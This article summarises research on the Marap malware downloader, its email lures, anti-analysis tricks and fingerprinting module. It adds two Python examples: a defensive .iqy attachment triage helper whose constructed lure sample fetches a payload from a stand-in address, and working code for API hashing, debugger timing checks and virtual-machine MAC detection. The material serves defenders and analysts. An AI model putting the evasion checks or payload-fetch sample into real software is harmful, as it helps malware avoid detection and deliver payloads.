Attackers no longer rely on slipping past defences at delivery time alone. Malware authors increasingly build anti-analysis techniques into their code so that it is harder to detect, to debug and to run in a sandbox, and automated tools frequently fail to see through these checks.
In the latest of a long series of malware reports, researchers at Proofpoint have described a new downloader dubbed ‘Marap’ (‘param’ spelled backwards). Its job is to download further modules and payloads onto the infected system. The campaigns delivering it reportedly target the financial sector, using sales- and banking-themed lures.
The malware is delivered by email in a new campaign. The messages carry attachments in several formats, including macro-enabled documents. Marap itself is written in C and includes anti-analysis techniques such as API hashing, timing checks and virtual-machine detection; it can also fetch a separate system fingerprinting module.
These features hide the code and its purpose from analysts and from the automated tools used for malware detection.
MARAP: How Was It Discovered?
The downloader was noticed when Proofpoint researchers observed several large email campaigns delivering it. The emails carried the following kinds of attachment:
- Microsoft Excel Web Query (“.iqy”) files
- Password-protected ZIP archives containing “.iqy” files
- PDF documents with embedded “.iqy” files
- Microsoft Word documents containing macros
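Added example (Python, not code from the Proofpoint report or from the original article): a small triage routine for the .iqy attachment types listed above. It parses the Excel Web Query format, reports why the fetch URL looks suspicious, and lists .iqy entries inside a ZIP without needing the archive password, since entry names live in the unencrypted central directory. The sample files, the 192.0.2.10 address and the reports.example.com host are constructed for this example, and the blocking heuristics are assumptions, not anything the report states.

```python
"""Triage helper for the .iqy attachment types listed above.

Added example, not code from the Proofpoint report. An Excel Web Query file
is plain text: the literal 'WEB', a version line, the URL Excel will fetch,
then optional key=value option lines. The sample files and the trusted host
below are constructed for this example; the heuristics are illustrative.
"""
import io
import zipfile
from urllib.parse import urlparse


def parse_iqy(text: str) -> dict:
    """Split an .iqy file into its version, fetch URL and option lines."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel Web Query file")
    options = {}
    for line in lines[3:]:
        key, _, value = line.partition("=")
        options[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "options": options}


def iqy_verdict(text: str, trusted_hosts=()) -> list:
    """Reasons to block this .iqy; an empty list means nothing suspicious."""
    info = parse_iqy(text)
    url = urlparse(info["url"])
    reasons = []
    if url.scheme == "http":
        reasons.append("cleartext HTTP fetch")
    elif url.scheme != "https":
        reasons.append(f"unexpected scheme {url.scheme!r}")
    if url.hostname not in trusted_hosts:
        reasons.append(f"untrusted host {url.hostname}")
    # Lure files usually carry a bare URL; legitimate reporting queries set
    # options such as Selection= or Formatting= (illustrative heuristic).
    if not info["options"]:
        reasons.append("no query options, bare URL fetch")
    return reasons


def iqy_entries_in_zip(data: bytes) -> list:
    """(name, encrypted) for each .iqy entry. Entry names live in the central
    directory, so they are readable even when the archive is password-protected."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(zi.filename, bool(zi.flag_bits & 0x1))
                for zi in zf.infolist() if zi.filename.lower().endswith(".iqy")]


# Constructed samples: a lure fetching a payload over HTTP from a TEST-NET
# address, and a benign internal report query.
LURE_IQY = "WEB\n1\nhttp://192.0.2.10/1.dat\n"
BENIGN_IQY = ("WEB\n1\nhttps://reports.example.com/sales.aspx\n"
              "Selection=AllTables\nFormatting=None\n")


def build_sample_zip() -> bytes:
    """Constructed archive with one .iqy lure and one harmless file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.iqy", LURE_IQY)
        zf.writestr("readme.txt", "constructed sample archive")
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("lure", LURE_IQY), ("benign", BENIGN_IQY)):
        print(label, parse_iqy(sample)["url"],
              iqy_verdict(sample, trusted_hosts=("reports.example.com",)))
    print(iqy_entries_in_zip(build_sample_zip()))
```

In a mail gateway this runs on the attachment bytes before delivery; a password-protected ZIP still yields the entry names, so the mere presence of a .iqy inside an encrypted archive is enough to quarantine the message.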
The lure text in the emails refers to sales and banking. After analysing the campaigns, the researchers said,
“As defenses become more adept at catching commodity malware, threat actors and malware authors continue to explore new approaches to increase effectiveness and decrease the footprint and inherent “noisiness” of the malware they distribute.”
The researchers also added,
“This new downloader, along with another similar but unrelated malware that we will detail next week, point to a growing trend of small, versatile malware that give actors flexibility to launch future attacks and identify systems of interest that may lend themselves to more significant compromise.”
What Are the Anti-Analysis Techniques Used?
1. API Hashing: Instead of importing Windows API functions by name, the code stores hashes of the function names and resolves them at run time by walking a DLL's export table. Static tools and analysts see no import table and no readable API names, so the code's purpose stays hidden.
2. Timing Checks: A timing check at the start of a function compares timestamps taken before and after a short stretch of code. If execution took far longer than native speed allows, the sample assumes it is being debugged or run under sandbox instrumentation, which hinders both.
3. System MAC Address: The sample reads the system's MAC address and compares its vendor prefix (OUI) against the prefixes assigned to well-known virtual machine vendors; a match indicates an analysis VM rather than a real victim.
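The three checks above, reproduced from the analyst's side as an added example (Python, not code from the Proofpoint report or from Marap itself). ROR-13 stands in for the hash algorithm because the report does not name Marap's; the export list, the MAC addresses and the timing threshold are constructed or illustrative. The hash table is the practical part: precomputing the hashes of every known export is how an analyst recovers the API calls behind hashed imports.

```python
"""Analyst-side reproduction of the three anti-analysis checks above.

Added example, not code from the Proofpoint report or from Marap itself.
Assumptions: ROR-13 is used as a stand-in hash (the report does not name
Marap's algorithm), the timing threshold is illustrative, and the export
names and MAC addresses are constructed sample data.
"""
import time


# 1. API hashing: the binary stores 32-bit hashes, not API names, and walks a
# DLL's export table at run time until a name hashes to the stored value.
def ror13_hash(name: str) -> int:
    """Rotate-right-13 hash over the ASCII bytes of an export name."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


# Constructed stand-in for kernel32.dll's export list.
KERNEL32_EXPORTS = ["CreateFileA", "GetTickCount", "IsDebuggerPresent",
                    "LoadLibraryA", "VirtualAlloc", "WinExec"]


def build_hash_table(exports) -> dict:
    """Precompute hash -> name; this is how an analyst recovers the API calls
    behind hashed imports."""
    return {ror13_hash(n): n for n in exports}


def resolve_api(hash_value: int, table: dict):
    """The malware's side: turn a stored hash back into an export name."""
    return table.get(hash_value)


# 2. Timing check: time a short stretch of code; a debugger single-stepping
# through it or sandbox instrumentation makes it take far longer.
def elapsed_for_probe(work: int = 1000) -> int:
    """Nanoseconds spent in a small loop of cheap operations."""
    t0 = time.perf_counter_ns()
    acc = 0
    for i in range(work):
        acc ^= i
    return time.perf_counter_ns() - t0


def debugger_suspected(elapsed_ns: int, threshold_ns: int = 100_000_000) -> bool:
    """True when the probe ran far slower than native execution allows."""
    return elapsed_ns > threshold_ns


# 3. MAC address check: the first three octets (OUI) identify the NIC vendor,
# and hypervisors use well-known OUIs for their virtual adapters.
VM_OUI_PREFIXES = {
    "00:05:69": "VMware", "00:0C:29": "VMware", "00:1C:14": "VMware",
    "00:50:56": "VMware", "08:00:27": "VirtualBox", "00:1C:42": "Parallels",
    "00:16:3E": "Xen", "00:15:5D": "Hyper-V",
}


def vm_vendor_for_mac(mac: str):
    """Return the hypervisor vendor for a MAC, or None for a physical NIC."""
    octets = mac.strip().replace("-", ":").upper().split(":")
    if len(octets) != 6:
        raise ValueError(f"malformed MAC address: {mac!r}")
    return VM_OUI_PREFIXES.get(":".join(octets[:3]))


def analysis_environment_detected(macs, elapsed_ns: int) -> bool:
    """Combined verdict a sample would take before unpacking its real payload."""
    return debugger_suspected(elapsed_ns) or any(vm_vendor_for_mac(m) for m in macs)


if __name__ == "__main__":
    table = build_hash_table(KERNEL32_EXPORTS)
    h = ror13_hash("WinExec")
    print(f"0x{h:08x} -> {resolve_api(h, table)}")
    print("debugger suspected:", debugger_suspected(elapsed_for_probe()))
    for mac in ("00:0c:29:12:34:56", "3c-22-fb-aa-bb-cc"):
        print(mac, "->", vm_vendor_for_mac(mac))
```

When reversing a real sample the table is built from the actual export names of the DLLs it loads, and the hash routine is lifted from the binary; the MAC check is defeated in a sandbox simply by assigning the VM adapter a non-hypervisor OUI.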
What Other Modules Is It Using?
Beyond the core downloader, Marap can load additional modules. Together with the checks above this keeps the initial footprint small and leaves the actors free to decide later what to deliver. The components observed so far are these:
1. Command & Control
Marap uses HTTP for its command and control traffic. After executing a command it sends a reply to the C&C server containing the bot ID, the command, the command ID, a flag controlling the response type, the command status code and the response data.
2. System Fingerprinting Module
This module is a dynamic link library (DLL), also written in C. It collects the following information and sends it to the C&C server operated by the attackers:
- Domain name
- IP address
- Windows version
- List of Microsoft Outlook .ost files
- Anti-virus software detected
Given the financial-sector lures and the host fingerprinting, it would not be surprising to see banks and financial institutions among the victims of a follow-on compromise. The reconnaissance this downloader performs is exactly what an attacker needs before choosing where to deploy a more damaging payload, whether a banking trojan or ransomware that holds the institution's own data for payment.